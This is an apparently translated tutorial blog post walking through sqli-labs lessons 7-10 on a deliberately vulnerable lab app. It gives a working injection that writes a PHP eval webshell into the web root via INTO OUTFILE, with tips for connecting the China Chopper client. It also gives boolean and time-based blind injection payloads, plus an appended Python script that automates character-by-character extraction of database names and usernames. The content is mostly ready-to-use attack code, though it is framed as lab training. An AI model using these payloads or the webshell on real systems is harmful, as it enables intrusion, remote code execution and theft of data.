sqli-labs lessons 7-10 (file export, boolean blind, time-based (delay) injection)

Preface:

  First of all, the database has to be configured so that the file functions used below are allowed.

  In the mysql command line, run show variables like '%secure%'; to view the current value of secure_file_priv. If it shows NULL, MySQL refuses every load_file() and INTO OUTFILE; in that case open C:\phpstudy\PHPTutorial\MySQL\my.ini and add secure_file_priv = "/" under the [mysqld] section (an empty value, secure_file_priv = "", also lifts the restriction). The connecting account additionally needs the FILE privilege, which the MySQL root account has.

  Restart phpStudy for the change to take effect.

  1. load_file(file_name), the file read function:

   load_file(file_name) reads the file and returns its contents as a string.

   The MySQL user must have the FILE privilege and the file must be readable by the server (and allowed by secure_file_priv); otherwise the function returns NULL. (This is the reason for the configuration change above.)

  2. select ....... into outfile 'file_name':

  Writes the selected rows to a file. The same FILE privilege is required, and the target must be writable by the server, before this statement can execute.

  For example: select version() into outfile "c:\\phpstudy\\111.txt". Inside a MySQL string literal \\ is one backslash, so it plays the same role as / in a Windows path. When this statement executes successfully, the database version is written into the file 111.txt.

  What we select can just as well be a one-line trojan, which is used together with the China Chopper (中国菜刀) client: <?php @eval($_POST["mima"]);?>.

  ps: the content selected here is not limited to trojans; plenty of other things can be written the same way.

 

   3. The one-line trojan:

  <?php @eval($_POST["crow"]);?> is the PHP version; its password is crow.

  One-line trojans are mostly used together with China Chopper.

 

  On to the lesson:

  Looking at the source code, id is wrapped in ')). The principle is the same as before: close the wrapping and construct the statement accordingly.

  Execute the statement:

?id=1')) union select 1,2,'<?php @eval($_POST["mm"]);?>' into outfile "C:\\phpStudy\\WWW\\sqli-labs-master\\Less-7\\111.php" %23

   A few points to note. First, into outfile refuses to overwrite an existing file, so a php file with the same name must not already be in the target directory.

  About the one-liner '<?php @eval($_POST["mm"]);?>': note where the space goes, between php and @eval and nowhere else (no space between <? and php, and the closing ?> must be present). Many failures to connect with the Chopper client come down to a malformed one-liner.

  Although the page reports an error, 111.php has been created and contains the injected content.

   Open China Chopper, right-click the blank area and choose Add; the following page appears.

  Note the format of the shell path as in the screenshot below: it is the URL of the shell, not a local absolute path. The password behind it is mm, the two letters in the brackets of the one-liner.

   A successful connection looks like this:


less-8:  

    1. Boolean blind:

   id is wrapped in single quotes; close the quote and construct the statement as usual.

   The left() and ascii()+substr() guessing methods were used in earlier lessons and are not repeated here.

   The following describes time-based (delay) injection.

   2. Time-based injection: combine if() with sleep(). When the condition is true the page returns immediately; when it is false sleep() runs and the response is delayed, so the truth value is read from how long the page takes to respond.

   if(condition, a, b): if the condition is true, evaluate a; otherwise evaluate b.

   sleep(a): wait a seconds before responding.

   For example, execute ?id=1' and if(length(database())=8,1,sleep(10)) %23

      When the database name is 8 characters long the page responds quickly; otherwise the response is delayed by 10 seconds.

      Likewise, execute ?id=1' and if(ascii(substr(database(),1,1))>110,1,sleep(10)) %23

      Similar to the above. It is quite time-consuming; personally I feel it is logically not as fast as boolean blind injection with binary search.

Some of the steps are attached below:
The database name is 8 characters long

Guessing the database name
use and left(database(),1)>'a' to guess the first character
             and left(database(),2)>'sa' to guess the first 2 characters
             left(str,num) returns the first num characters of str (from left to right)
2. Determining table names

 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))
Determining column names, method 1: ascii+substr
     and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>97 %23

Determining column names, method 2: regexp
     and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username' limit 0,1) %23

3.1 Using ascii and substr to extract the contents of a column:

  ?id=1' and ascii(substr((select username from security.users limit 0,1),1,1))=68 %23


less 9-10:

  Unlike the above, whatever the input, the page always returns You are in ....

   So only time-based injection can be used.

  In less 9, id is wrapped in '

  In less 10 it is wrapped in ". Just take care to close the statement; the method is the time-based injection described above.
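As an added example (not code from the original post), the following Python automates the Less-8 boolean blind extraction and the Less-9/10 time-based extraction described above. Both use the same binary search over ascii(substr(...,pos,1))>N, which is the "binary search" the text prefers over linear guessing; the only difference is the oracle: Less-8 checks for the "You are in" marker, Less-9/10 measure the response time. The target URL, the marker text and the sleep length are assumptions, and the offline oracle at the bottom is a constructed stand-in for the lab page so the script runs without a target.

```python
"""Blind SQL injection extraction for sqli-labs Less-8 (boolean) and
Less-9/10 (time-based), using binary search on ascii(substr(...)).

Added example, not code from the original post. TARGET, TRUE_MARKER and
SLEEP_SECONDS are assumptions; make_fake_oracle() is a constructed
stand-in for the real page.
"""
import re
import time
import urllib.parse
import urllib.request

TARGET = "http://127.0.0.1/sqli-labs-master/Less-8/"   # assumed
PREFIX = "1'"          # closes the single quote (Less-10 would use 1")
TRUE_MARKER = "You are in"
SLEEP_SECONDS = 3


def probe_url(condition, time_based=False):
    """Build the probe URL.

    boolean:    ?id=1' and (<cond>) #
    time-based: ?id=1' and if((<cond>),1,sleep(N)) #
    quote() encodes the trailing '#' as %23, as the page's payloads do.
    """
    if time_based:
        injected = f"{PREFIX} and if(({condition}),1,sleep({SLEEP_SECONDS})) #"
    else:
        injected = f"{PREFIX} and ({condition}) #"
    return TARGET + "?id=" + urllib.parse.quote(injected)


def boolean_oracle(condition):
    """Less-8: the condition is true iff the page still says 'You are in'."""
    with urllib.request.urlopen(probe_url(condition)) as resp:
        return TRUE_MARKER in resp.read().decode("utf-8", "replace")


def time_oracle(condition):
    """Less-9/10: the page looks the same either way, so the condition is
    true iff the response came back before sleep() could fire."""
    start = time.monotonic()
    with urllib.request.urlopen(probe_url(condition, time_based=True)) as resp:
        resp.read()
    return time.monotonic() - start < SLEEP_SECONDS


def extract_char(oracle, expr, pos):
    """Binary-search the ASCII code of character `pos` (1-based) of `expr`.

    About 7 requests per character instead of up to 127 '=' guesses.
    Past the end of the string MySQL's substr() yields '' and ascii('')
    is 0, which extract_string() uses as the terminator.
    """
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"ascii(substr(({expr}),{pos},1))>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(oracle, expr, max_len=64):
    """Pull `expr` (database(), a table name, a username...) one char at a time."""
    chars = []
    for pos in range(1, max_len + 1):
        code = extract_char(oracle, expr, pos)
        if code == 0:
            break
        chars.append(chr(code))
    return "".join(chars)


_PROBE = re.compile(r"^ascii\(substr\(\((.*)\),(\d+),1\)\)>(\d+)$")


def make_fake_oracle(answers):
    """Constructed offline stand-in for the target: evaluates the probes
    extract_char() emits against a dict of expr -> secret value, with
    MySQL's ascii('') = 0 past the end of the value."""
    def oracle(condition):
        m = _PROBE.match(condition)
        if not m:
            raise ValueError("unexpected probe: " + condition)
        expr, pos, threshold = m.group(1), int(m.group(2)), int(m.group(3))
        value = answers[expr]
        code = ord(value[pos - 1]) if pos <= len(value) else 0
        return code > threshold
    return oracle


if __name__ == "__main__":
    # Offline demo; against a live lab pass boolean_oracle or time_oracle.
    fake = make_fake_oracle({"database()": "security",
                             "select username from security.users limit 0,1": "Dumb"})
    print(extract_string(fake, "database()"))
    print(extract_string(fake, "select username from security.users limit 0,1"))
```

Against the lab itself, call extract_string(boolean_oracle, "database()") for Less-8 and extract_string(time_oracle, ...) for Less-9; for Less-10 change PREFIX to 1". With the time-based oracle choose SLEEP_SECONDS well above the page's normal latency, otherwise a slow true response is misread as false and the binary search drifts.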

Origin www.cnblogs.com/Zh1z3ven/p/12421504.html